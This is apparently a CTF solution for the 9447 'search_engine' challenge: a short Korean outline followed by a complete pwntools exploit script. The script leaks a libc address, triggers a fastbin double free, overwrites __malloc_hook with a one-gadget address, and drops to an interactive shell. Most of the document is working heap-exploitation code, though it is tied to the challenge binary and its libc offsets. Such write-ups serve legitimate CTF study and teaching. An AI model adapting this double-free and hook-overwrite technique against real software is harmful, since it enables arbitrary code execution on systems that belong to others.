9447ctf - search_engine
먼저 smallbin을 만들고 search를 이용하여 libc leak
fastbin 3개를 만들고 double free
fd를 __malloc_hook-35로 설정
__malloc_hook -> oneshot
get shell
# Exploit script for the 9447 CTF "search_engine" challenge, following the
# summary above: libc leak through a smallbin-sized chunk, fastbin double
# free, __malloc_hook overwrite, shell.  Every numeric offset below
# (0x3c4b78, 0x4526a, 0xf02a4, the -35) is hard-coded for the challenge's
# specific libc build and will not transfer to another libc.
# NOTE(review): written against Python 2 pwntools -- r.recv(6) returns bytes
# while '\x00' is a str, so the ljust/u64 line raises TypeError on Python 3.
from pwn import *


def search(size, word):
    # Menu option 1: send `size` followed by `word` at the search prompt.
    # Uses the module-level sla/sa aliases bound further down, so it must
    # not be called before `r` has been created.
    sla('3: Quit\n', '1')
    sla('size:', str(size))
    sa('word:', word)


def index(size, sentence):
    # Menu option 2: send `size` followed by `sentence` at the index prompt.
    sla('3: Quit\n', '2')
    sla('size:', str(size))
    sa('sentence:', sentence)


r = process('./search')
e = ELF('./search')
libc = e.libc
oneshot = 0x4526a  # NOTE(review): never used; the final payload uses 0xf02a4 instead
sla = r.sendlineafter
sa = r.sendafter
ru = r.recvuntil

# Step 1 (libc leak): index a 0x87-byte sentence ending in ' m', search for
# it, then search for '\x00' -- the "Found 135: " line (135 == len(pay))
# echoes a heap-resident pointer.  0x3c4b78 is presumably that pointer's
# distance from libc base, since `leak` is later added to libc symbols.
pay = 's' * 0x85 + ' m'
index(len(pay), pay)
search(1, 'm')
sla('?', 'y')
search('1', '\x00')  # size passed as str; harmless because search() applies str()
ru('Found 135: ')
leak = u64(r.recv(6).ljust(8, '\x00')) - 0x3c4b78
log.info(hex(leak))
sla('?', 'n')

# Step 2 (double free): three 0x60-byte sentences, then the y/n answers drive
# the challenge's prompts after each search to produce the double free named
# in the summary -- TODO confirm the prompt semantics against the binary.
pay = 'A' * 0x5d + ' a '
index(len(pay), pay)
index(len(pay), pay)
index(len(pay), pay)
search(1, 'a')
sla('?', 'y')
sla('?', 'y')
sla('?', 'y')
search(1, '\x00')
sla('?', 'y')
sla('?', 'y')
sla('?', 'n')

# Step 3: `pay` carries the fd value __malloc_hook-35 (see summary);
# `payload` is 19 filler bytes followed by the one-gadget address that lands
# on __malloc_hook.  Both are padded to the chunk sizes used above.
pay = p64(leak + libc.symbols['__malloc_hook'] - 35) * 2
pay = pay.ljust(0x5e, 'A')
payload = 'A' * 19 + p64(leak + 0xf02a4)
payload = payload.ljust(0x5d, 'A')
index(len(pay), pay)
index(len(pay), pay)
index(len(pay), pay)
index(len(payload), payload)
r.interactive()